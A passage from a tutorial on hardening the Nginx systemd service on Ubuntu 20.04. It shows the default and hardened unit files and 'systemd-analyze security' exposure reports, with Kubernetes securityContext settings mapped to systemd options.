&lt;p&gt;While antivirus a well-executed read-only backup strategy are essential for identifying and reducing the impact of threats, it's important to establish a strong foundation of security from the outset. Rather than solely focusing on mitigating consequences after the fact, reducing the attack surface should be a primary goal.&lt;/p&gt;

&lt;p&gt;This can be done by limiting access to the underlying system, like running as an arbitrary user and dropping unneeded privileges. In Kubernetes, this would for example typically mean using non-root base images in combination with &lt;a href="https://kubernetes.io/docs/tasks/configure-pod-container/security-context/" rel="noopener noreferrer"&gt;&lt;code&gt;securityContext&lt;/code&gt;&lt;/a&gt; definitions.&lt;/p&gt;

&lt;p&gt;But in some cases, it's better or even required to deploy directly on virtual machines. So how can a similar strategy be applied there?&lt;/p&gt;

&lt;h2&gt;
  
  
  🔒 Hardening Nginx: Step by Step
&lt;/h2&gt;

&lt;p&gt;Let's examine a real-world example using the Nginx service file provided by Ubuntu 20.04:&lt;/p&gt;

&lt;h3&gt;
  
  
  The Defaults
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;david@proxy:~$ systemctl cat nginx.service&lt;/code&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight ini"&gt;&lt;code&gt;&lt;span class="c"&gt;# /lib/systemd/system/nginx.service
&lt;/span&gt;&lt;span class="nn"&gt;[Unit]&lt;/span&gt;
&lt;span class="py"&gt;Description&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;A high performance web server and a reverse proxy server&lt;/span&gt;
&lt;span class="py"&gt;Documentation&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;man:nginx(8)&lt;/span&gt;
&lt;span class="py"&gt;After&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;network.target&lt;/span&gt;

&lt;span class="nn"&gt;[Service]&lt;/span&gt;
&lt;span class="py"&gt;Type&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;forking&lt;/span&gt;
&lt;span class="py"&gt;PIDFile&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;/run/nginx.pid&lt;/span&gt;
&lt;span class="py"&gt;ExecStartPre&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;/usr/sbin/nginx -t -q -g 'daemon on; master_process on;'&lt;/span&gt;
&lt;span class="py"&gt;ExecStart&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;/usr/sbin/nginx -g 'daemon on; master_process on;'&lt;/span&gt;
&lt;span class="py"&gt;ExecReload&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;/usr/sbin/nginx -g 'daemon on; master_process on;' -s reload&lt;/span&gt;
&lt;span class="py"&gt;ExecStop&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;-/sbin/start-stop-daemon --quiet --stop --retry QUIT/5 --pidfile /run/nginx.pid&lt;/span&gt;
&lt;span class="py"&gt;TimeoutStopSec&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;5&lt;/span&gt;
&lt;span class="py"&gt;KillMode&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;mixed&lt;/span&gt;

&lt;span class="nn"&gt;[Install]&lt;/span&gt;
&lt;span class="py"&gt;WantedBy&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;multi-user.target&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;By default, the service runs as the &lt;code&gt;root&lt;/code&gt; user. Therefore, processes spawned by &lt;code&gt;/usr/sbin/nginx&lt;/code&gt; have all privileges of the &lt;code&gt;root&lt;/code&gt; user and group, which could allow malicious software to control every part of the system when there is an exploit for Nginx. While Nginx is also able to use arbitrary users by itself, the main process that's started by the service still has root privileges. In many cases, this is not required and can be avoided by using Systemd's already built-in capabilities.&lt;/p&gt;

&lt;h3&gt;
  
  
  Breaking it Down
&lt;/h3&gt;

&lt;p&gt;The &lt;code&gt;systemd-analyze&lt;/code&gt; cli tool can help to get an overview of potential issues of Systemd services:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;systemd-analyze security                # provides a high-level overview including a
                                        # numeric "exposure" value of Systemd services

systemd-analyze security &amp;lt;service_name&amp;gt; # shows detailed security-related information
                                        # about a single service
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The output for the &lt;code&gt;nginx&lt;/code&gt; service looks like this:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;david@proxy:~$ systemd-analyze security nginx.service --no-pager&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;
  Nginx Service Security Summary
  &lt;br&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;  NAME                                                        DESCRIPTION                                                       EXPOSURE
✗ PrivateNetwork=                                             Service has access to the host's network                               0.5
✗ User=/DynamicUser=                                          Service runs as root user                                              0.4
✗ CapabilityBoundingSet=~CAP_SET(UID|GID|PCAP)                Service may change UID/GID identities/capabilities                     0.3
✗ CapabilityBoundingSet=~CAP_SYS_ADMIN                        Service has administrator privileges                                   0.3
✗ CapabilityBoundingSet=~CAP_SYS_PTRACE                       Service has ptrace() debugging abilities                               0.3
✗ RestrictAddressFamilies=~AF_(INET|INET6)                    Service may allocate Internet sockets                                  0.3
✗ RestrictNamespaces=~CLONE_NEWUSER                           Service may create user namespaces                                     0.3
✗ RestrictAddressFamilies=~…                                  Service may allocate exotic sockets                                    0.3
✗ CapabilityBoundingSet=~CAP_(CHOWN|FSETID|SETFCAP)           Service may change file ownership/access mode/capabilities unres…      0.2
✗ CapabilityBoundingSet=~CAP_(DAC_*|FOWNER|IPC_OWNER)         Service may override UNIX file/IPC permission checks                   0.2
✗ CapabilityBoundingSet=~CAP_NET_ADMIN                        Service has network configuration privileges                           0.2
✗ CapabilityBoundingSet=~CAP_RAWIO                            Service has raw I/O access                                             0.2
✗ CapabilityBoundingSet=~CAP_SYS_MODULE                       Service may load kernel modules                                        0.2
✗ CapabilityBoundingSet=~CAP_SYS_TIME                         Service processes may change the system clock                          0.2
✗ DeviceAllow=                                                Service has no device ACL                                              0.2
✗ IPAddressDeny=                                              Service does not define an IP address whitelist                        0.2
✓ KeyringMode=                                                Service doesn't share key material with other services
✗ NoNewPrivileges=                                            Service processes may acquire new privileges                           0.2
✓ NotifyAccess=                                               Service child processes cannot alter service state
✗ PrivateDevices=                                             Service potentially has access to hardware devices                     0.2
✗ PrivateMounts=                                              Service may install system mounts                                      0.2
✗ PrivateTmp=                                                 Service has access to other software's temporary files                 0.2
✗ PrivateUsers=                                               Service has access to other users                                      0.2
✗ ProtectClock=                                               Service may write to the hardware clock or system clock                0.2
✗ ProtectControlGroups=                                       Service may modify the control group file system                       0.2
✗ ProtectHome=                                                Service has full access to home directories                            0.2
✗ ProtectKernelLogs=                                          Service may read from or write to the kernel log ring buffer           0.2
✗ ProtectKernelModules=                                       Service may load or read kernel modules                                0.2
✗ ProtectKernelTunables=                                      Service may alter kernel tunables                                      0.2
✗ ProtectSystem=                                              Service has full access to the OS file hierarchy                       0.2
✗ RestrictAddressFamilies=~AF_PACKET                          Service may allocate packet sockets                                    0.2
✗ RestrictSUIDSGID=                                           Service may create SUID/SGID files                                     0.2
✗ SystemCallArchitectures=                                    Service may execute system calls with all ABIs                         0.2
✗ SystemCallFilter=~@clock                                    Service does not filter system calls                                   0.2
✗ SystemCallFilter=~@debug                                    Service does not filter system calls                                   0.2
✗ SystemCallFilter=~@module                                   Service does not filter system calls                                   0.2
✗ SystemCallFilter=~@mount                                    Service does not filter system calls                                   0.2
✗ SystemCallFilter=~@raw-io                                   Service does not filter system calls                                   0.2
✗ SystemCallFilter=~@reboot                                   Service does not filter system calls                                   0.2
✗ SystemCallFilter=~@swap                                     Service does not filter system calls                                   0.2
✗ SystemCallFilter=~@privileged                               Service does not filter system calls                                   0.2
✗ SystemCallFilter=~@resources                                Service does not filter system calls                                   0.2
✓ AmbientCapabilities=                                        Service process does not receive ambient capabilities
✗ CapabilityBoundingSet=~CAP_AUDIT_*                          Service has audit subsystem access                                     0.1
✗ CapabilityBoundingSet=~CAP_KILL                             Service may send UNIX signals to arbitrary processes                   0.1
✗ CapabilityBoundingSet=~CAP_MKNOD                            Service may create device nodes                                        0.1
✗ CapabilityBoundingSet=~CAP_NET_(BIND_SERVICE|BROADCAST|RAW) Service has elevated networking privileges                             0.1
✗ CapabilityBoundingSet=~CAP_SYSLOG                           Service has access to kernel logging                                   0.1
✗ CapabilityBoundingSet=~CAP_SYS_(NICE|RESOURCE)              Service has privileges to change resource use parameters               0.1
✗ RestrictNamespaces=~CLONE_NEWCGROUP                         Service may create cgroup namespaces                                   0.1
✗ RestrictNamespaces=~CLONE_NEWIPC                            Service may create IPC namespaces                                      0.1
✗ RestrictNamespaces=~CLONE_NEWNET                            Service may create network namespaces                                  0.1
✗ RestrictNamespaces=~CLONE_NEWNS                             Service may create file system namespaces                              0.1
✗ RestrictNamespaces=~CLONE_NEWPID                            Service may create process namespaces                                  0.1
✗ RestrictRealtime=                                           Service may acquire realtime scheduling                                0.1
✗ SystemCallFilter=~@cpu-emulation                            Service does not filter system calls                                   0.1
✗ SystemCallFilter=~@obsolete                                 Service does not filter system calls                                   0.1
✗ RestrictAddressFamilies=~AF_NETLINK                         Service may allocate netlink sockets                                   0.1
✗ RootDirectory=/RootImage=                                   Service runs within the host's root directory                          0.1
    SupplementaryGroups=                                        Service runs as root, option does not matter
✗ CapabilityBoundingSet=~CAP_MAC_*                            Service may adjust SMACK MAC                                           0.1
✗ CapabilityBoundingSet=~CAP_SYS_BOOT                         Service may issue reboot()                                             0.1
✓ Delegate=                                                   Service does not maintain its own delegated control group subtree
✗ LockPersonality=                                            Service may change ABI personality                                     0.1
✗ MemoryDenyWriteExecute=                                     Service may create writable executable memory mappings                 0.1
    RemoveIPC=                                                  Service runs as root, option does not apply
✗ RestrictNamespaces=~CLONE_NEWUTS                            Service may create hostname namespaces                                 0.1
✗ UMask=                                                      Files created by service are world-readable by default                 0.1
✗ CapabilityBoundingSet=~CAP_LINUX_IMMUTABLE                  Service may mark files immutable                                       0.1
✗ CapabilityBoundingSet=~CAP_IPC_LOCK                         Service may lock memory into RAM                                       0.1
✗ CapabilityBoundingSet=~CAP_SYS_CHROOT                       Service may issue chroot()                                             0.1
✗ ProtectHostname=                                            Service may change system host/domainname                              0.1
✗ CapabilityBoundingSet=~CAP_BLOCK_SUSPEND                    Service may establish wake locks                                       0.1
✗ CapabilityBoundingSet=~CAP_LEASE                            Service may create file leases                                         0.1
✗ CapabilityBoundingSet=~CAP_SYS_PACCT                        Service may use acct()                                                 0.1
✗ CapabilityBoundingSet=~CAP_SYS_TTY_CONFIG                   Service may issue vhangup()                                            0.1
✗ CapabilityBoundingSet=~CAP_WAKE_ALARM                       Service may program timers that wake up the system                     0.1
✗ RestrictAddressFamilies=~AF_UNIX                            Service may allocate local sockets                                     0.1

→ Overall exposure level for nginx.service: 9.6 UNSAFE 😨
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;




&lt;/p&gt;

&lt;p&gt;A lot of those capabilities are not required to run a web server, so it's best to limit the service's privileges. As interfacing with the Linux kernel can be very complex and is prone to changes, Systemd services offer a way to define common configurations directly in the service files. Given the multitude of configuration parameters for Systemd services, this example will concentrate on values significantly affecting security. It will use a standard Kubernetes &lt;code&gt;securityContext&lt;/code&gt; as a foundation.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Principle of Least Privilege
&lt;/h3&gt;

&lt;p&gt;Adopting the principle of least privilege is crucial. By restricting access and privileges to the bare essentials, the attack surface diminishes significantly. When using Kubernetes resources, you'd usually use a &lt;code&gt;securityContext&lt;/code&gt; definition to limit capabilities of a Pod:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="nn"&gt;...&lt;/span&gt;
    &lt;span class="na"&gt;securityContext&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;runAsNonRoot&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
    &lt;span class="na"&gt;runAsUser&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;1001&lt;/span&gt;
    &lt;span class="na"&gt;runAsGroup&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;2001&lt;/span&gt;
    &lt;span class="na"&gt;allowPrivilegeEscalation&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;false&lt;/span&gt;
    &lt;span class="na"&gt;privileged&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;false&lt;/span&gt;
    &lt;span class="na"&gt;readOnlyRootFilesystem&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
    &lt;span class="na"&gt;capabilities&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;drop&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;all&lt;/span&gt;
&lt;span class="nn"&gt;...&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;In the above example, the process runs without root privileges on a read-only filesystem and all capabilities are dropped. A similar setup can be achieved using a Systemd service:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;runAsNonRoot: true&lt;/code&gt; ➜ no equivalent, if possible &lt;code&gt;DynamicUser&lt;/code&gt; can be used&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;runAsUser: 1001&lt;/code&gt; ➜ &lt;code&gt;User=&amp;lt;username&amp;gt;&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;runAsGroup: 2001&lt;/code&gt; ➜ &lt;code&gt;Group=&amp;lt;groupname&amp;gt;&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;allowPrivilegeEscalation: false&lt;/code&gt; ➜ &lt;code&gt;NoNewPrivileges=true&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;privileged: false&lt;/code&gt; ➜ no equivalent, &lt;code&gt;PrivateDevices=&amp;lt;...&amp;gt;&lt;/code&gt;, &lt;code&gt;Protect&amp;lt;...&amp;gt;=&amp;lt;...&amp;gt;&lt;/code&gt; etc. can be used&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;readOnlyRootFilesystem: true&lt;/code&gt; ➜ &lt;code&gt;ProtectSystem=strict&lt;/code&gt; / &lt;code&gt;TemporaryFileSystem=/:ro&lt;/code&gt; (this also hides all files, needs Systemd &amp;gt;= 238)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;capabilities.drop: ["all"]&lt;/code&gt; ➜ &lt;code&gt;CapabilityBoundingSet=&amp;lt;...&amp;gt;&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;There are a lot more ways to control the capabilities and permissions of Systemd services which are documented &lt;a href="https://www.freedesktop.org/software/systemd/man/systemd.exec.html" rel="noopener noreferrer"&gt;here&lt;/a&gt;. After applying some of these parameters to the Nginx service, the Unit File looks as follows:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;david@proxy:~$ systemctl cat nginx&lt;/code&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight ini"&gt;&lt;code&gt;&lt;span class="c"&gt;# /etc/systemd/system/nginx.service
# Rootless Nginx service based on https://github.com/stephan13360/systemd-services/blob/master/nginx/nginx.service
&lt;/span&gt;&lt;span class="nn"&gt;[Unit]&lt;/span&gt;
&lt;span class="c"&gt;# This is from the default nginx.service
&lt;/span&gt;&lt;span class="py"&gt;Description&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;nginx (hardened rootless)&lt;/span&gt;
&lt;span class="py"&gt;Documentation&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;https://nginx.org/en/docs/&lt;/span&gt;
&lt;span class="py"&gt;Documentation&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;https://github.com/stephan13360/systemd-services/blob/master/nginx/README.md&lt;/span&gt;
&lt;span class="py"&gt;After&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;network-online.target remote-fs.target nss-lookup.target&lt;/span&gt;
&lt;span class="py"&gt;Wants&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;network-online.target&lt;/span&gt;

&lt;span class="nn"&gt;[Service]&lt;/span&gt;
&lt;span class="c"&gt;# forking is not necessary as `daemon` is turned off in the nginx config
&lt;/span&gt;&lt;span class="py"&gt;Type&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;exec&lt;/span&gt;
&lt;span class="py"&gt;User&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;nginx&lt;/span&gt;
&lt;span class="py"&gt;Group&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;nginx&lt;/span&gt;
&lt;span class="c"&gt;## can be used e.g. for accessing directory containing SSL certs
#SupplementaryGroups=acme
# define runtime directory /run/nginx as rootless services can't access /run
&lt;/span&gt;&lt;span class="py"&gt;RuntimeDirectory&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;nginx&lt;/span&gt;
&lt;span class="c"&gt;# write logs to /var/log/nginx
&lt;/span&gt;&lt;span class="py"&gt;LogsDirectory&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;nginx&lt;/span&gt;
&lt;span class="c"&gt;# write cache to /var/cache/nginx
&lt;/span&gt;&lt;span class="py"&gt;CacheDirectory&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;nginx&lt;/span&gt;
&lt;span class="c"&gt;# configuration is in /etc/nginx
&lt;/span&gt;&lt;span class="py"&gt;ConfigurationDirectory&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;nginx&lt;/span&gt;

&lt;span class="py"&gt;ExecStart&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;/usr/sbin/nginx -c /etc/nginx/nginx.conf&lt;/span&gt;
&lt;span class="c"&gt;# PID is not necessary here as the service is not forking
&lt;/span&gt;&lt;span class="py"&gt;ExecReload&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;/usr/sbin/nginx -s reload&lt;/span&gt;

&lt;span class="py"&gt;Restart&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;on-failure&lt;/span&gt;
&lt;span class="py"&gt;RestartSec&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;10s&lt;/span&gt;

&lt;span class="c"&gt;# Hardening
# hide the entire filesystem tree from the service and also make it read only, requires systemd &amp;gt;=238
&lt;/span&gt;&lt;span class="py"&gt;TemporaryFileSystem&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;/:ro&lt;/span&gt;
&lt;span class="c"&gt;# Remount (bind) necessary paths, based on https://gitlab.com/apparmor/apparmor/blob/master/profiles/apparmor.d/abstractions/base,
# https://github.com/jelly/apparmor-profiles/blob/master/usr.bin.nginx,
# https://www.freedesktop.org/software/systemd/man/systemd.exec.html#RootDirectory=
#
# This gives access to (probably) necessary system files, allows journald logging
&lt;/span&gt;&lt;span class="py"&gt;BindReadOnlyPaths&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;/lib/ /lib64/ /usr/lib/ /usr/lib64/ /etc/ld.so.cache /etc/ld.so.conf /etc/ld.so.conf.d/ /etc/bindresvport.blacklist /usr/share/zoneinfo/ /usr/share/locale/ /etc/localtime /usr/share/common-licenses/ /etc/ssl/certs/ /etc/resolv.conf&lt;/span&gt;
&lt;span class="py"&gt;BindReadOnlyPaths&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;/dev/log /run/systemd/journal/socket /run/systemd/journal/stdout /run/systemd/notify&lt;/span&gt;
&lt;span class="c"&gt;# Additional access to service-specific directories
&lt;/span&gt;&lt;span class="py"&gt;BindReadOnlyPaths&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;/usr/sbin/nginx&lt;/span&gt;
&lt;span class="py"&gt;BindReadOnlyPaths&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;/run/ /usr/share/nginx/&lt;/span&gt;

&lt;span class="py"&gt;PrivateTmp&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;true&lt;/span&gt;
&lt;span class="py"&gt;PrivateDevices&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;true&lt;/span&gt;
&lt;span class="py"&gt;ProtectControlGroups&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;true&lt;/span&gt;
&lt;span class="py"&gt;ProtectKernelModules&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;true&lt;/span&gt;
&lt;span class="py"&gt;ProtectKernelTunables&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;true&lt;/span&gt;

&lt;span class="c"&gt;# Network access
&lt;/span&gt;&lt;span class="py"&gt;RestrictAddressFamilies&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;AF_UNIX AF_INET AF_INET6&lt;/span&gt;

&lt;span class="c"&gt;# Miscellaneous
&lt;/span&gt;&lt;span class="py"&gt;SystemCallArchitectures&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;native&lt;/span&gt;
&lt;span class="c"&gt;# also implicit because settings like MemoryDenyWriteExecute are set
&lt;/span&gt;&lt;span class="py"&gt;NoNewPrivileges&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;true&lt;/span&gt;
&lt;span class="py"&gt;MemoryDenyWriteExecute&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;true&lt;/span&gt;
&lt;span class="py"&gt;ProtectKernelLogs&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;true&lt;/span&gt;
&lt;span class="py"&gt;LockPersonality&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;true&lt;/span&gt;
&lt;span class="py"&gt;ProtectHostname&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;true&lt;/span&gt;
&lt;span class="py"&gt;RemoveIPC&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;true&lt;/span&gt;
&lt;span class="py"&gt;RestrictSUIDSGID&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;true&lt;/span&gt;
&lt;span class="py"&gt;ProtectClock&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;true&lt;/span&gt;

&lt;span class="c"&gt;# Capabilities to bind low ports (80, 443)
&lt;/span&gt;&lt;span class="py"&gt;AmbientCapabilities&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;CAP_NET_BIND_SERVICE&lt;/span&gt;

&lt;span class="nn"&gt;[Install]&lt;/span&gt;
&lt;span class="py"&gt;WantedBy&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;multi-user.target&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now, not only is the service running as non-root, but the process and sub-processes also only have access to a very limited part of the system. All filesystem access is dropped by default and only necessary system directories are either made available or substituted by temporary paths. Besides that, persistence is only possible where necessary which further limits the attack surface. Running &lt;code&gt;systemd-analyze&lt;/code&gt; again on the new service, the results are showing effect:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;david@proxy:~$ systemd-analyze security nginx.service --no-pager&lt;/code&gt;&lt;br&gt;

  Nginx Service Security Summary
  &lt;br&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;  NAME                                                        DESCRIPTION                                                       EXPOSURE
✗ PrivateNetwork=                                             Service has access to the host's network                               0.5
✓ User=/DynamicUser=                                          Service runs under a static non-root user identity
✗ CapabilityBoundingSet=~CAP_SET(UID|GID|PCAP)                Service may change UID/GID identities/capabilities                     0.3
✗ CapabilityBoundingSet=~CAP_SYS_ADMIN                        Service has administrator privileges                                   0.3
✗ CapabilityBoundingSet=~CAP_SYS_PTRACE                       Service has ptrace() debugging abilities                               0.3
✗ RestrictAddressFamilies=~AF_(INET|INET6)                    Service may allocate Internet sockets                                  0.3
✗ RestrictNamespaces=~CLONE_NEWUSER                           Service may create user namespaces                                     0.3
✓ RestrictAddressFamilies=~…                                  Service cannot allocate exotic sockets
✗ CapabilityBoundingSet=~CAP_(CHOWN|FSETID|SETFCAP)           Service may change file ownership/access mode/capabilities unres…      0.2
✗ CapabilityBoundingSet=~CAP_(DAC_*|FOWNER|IPC_OWNER)         Service may override UNIX file/IPC permission checks                   0.2
✗ CapabilityBoundingSet=~CAP_NET_ADMIN                        Service has network configuration privileges                           0.2
✓ CapabilityBoundingSet=~CAP_RAWIO                            Service has no raw I/O access
✓ CapabilityBoundingSet=~CAP_SYS_MODULE                       Service cannot load kernel modules
✓ CapabilityBoundingSet=~CAP_SYS_TIME                         Service processes cannot change the system clock
✗ DeviceAllow=                                                Service has a device ACL with some special devices                     0.1
✗ IPAddressDeny=                                              Service does not define an IP address whitelist                        0.2
✓ KeyringMode=                                                Service doesn't share key material with other services
✓ NoNewPrivileges=                                            Service processes cannot acquire new privileges
✓ NotifyAccess=                                               Service child processes cannot alter service state
✓ PrivateDevices=                                             Service has no access to hardware devices
✓ PrivateMounts=                                              Service cannot install system mounts
✓ PrivateTmp=                                                 Service has no access to other software's temporary files
✗ PrivateUsers=                                               Service has access to other users                                      0.2
✗ ProtectClock=                                               Service may write to the hardware clock or system clock                0.2
✓ ProtectControlGroups=                                       Service cannot modify the control group file system
✗ ProtectHome=                                                Service has full access to home directories                            0.2
✓ ProtectKernelLogs=                                          Service cannot read from or write to the kernel log ring buffer
✓ ProtectKernelModules=                                       Service cannot load or read kernel modules
✓ ProtectKernelTunables=                                      Service cannot alter kernel tunables (/proc/sys, …)
✗ ProtectSystem=                                              Service has full access to the OS file hierarchy                       0.2
✓ RestrictAddressFamilies=~AF_PACKET                          Service cannot allocate packet sockets
✓ RestrictSUIDSGID=                                           SUID/SGID file creation by service is restricted
✓ SystemCallArchitectures=                                    Service may execute system calls only with native ABI
✗ SystemCallFilter=~@clock                                    Service does not filter system calls                                   0.2
✗ SystemCallFilter=~@debug                                    Service does not filter system calls                                   0.2
✗ SystemCallFilter=~@module                                   Service does not filter system calls                                   0.2
✗ SystemCallFilter=~@mount                                    Service does not filter system calls                                   0.2
✗ SystemCallFilter=~@raw-io                                   Service does not filter system calls                                   0.2
✗ SystemCallFilter=~@reboot                                   Service does not filter system calls                                   0.2
✗ SystemCallFilter=~@swap                                     Service does not filter system calls                                   0.2
✗ SystemCallFilter=~@privileged                               Service does not filter system calls                                   0.2
✗ SystemCallFilter=~@resources                                Service does not filter system calls                                   0.2
✗ AmbientCapabilities=                                        Service process receives ambient capabilities                          0.1
✗ CapabilityBoundingSet=~CAP_AUDIT_*                          Service has audit subsystem access                                     0.1
✗ CapabilityBoundingSet=~CAP_KILL                             Service may send UNIX signals to arbitrary processes                   0.1
✓ CapabilityBoundingSet=~CAP_MKNOD                            Service cannot create device nodes
✗ CapabilityBoundingSet=~CAP_NET_(BIND_SERVICE|BROADCAST|RAW) Service has elevated networking privileges                             0.1
✓ CapabilityBoundingSet=~CAP_SYSLOG                           Service has no access to kernel logging
✗ CapabilityBoundingSet=~CAP_SYS_(NICE|RESOURCE)              Service has privileges to change resource use parameters               0.1
✗ RestrictNamespaces=~CLONE_NEWCGROUP                         Service may create cgroup namespaces                                   0.1
✗ RestrictNamespaces=~CLONE_NEWIPC                            Service may create IPC namespaces                                      0.1
✗ RestrictNamespaces=~CLONE_NEWNET                            Service may create network namespaces                                  0.1
✗ RestrictNamespaces=~CLONE_NEWNS                             Service may create file system namespaces                              0.1
✗ RestrictNamespaces=~CLONE_NEWPID                            Service may create process namespaces                                  0.1
✗ RestrictRealtime=                                           Service may acquire realtime scheduling                                0.1
✗ SystemCallFilter=~@cpu-emulation                            Service does not filter system calls                                   0.1
✗ SystemCallFilter=~@obsolete                                 Service does not filter system calls                                   0.1
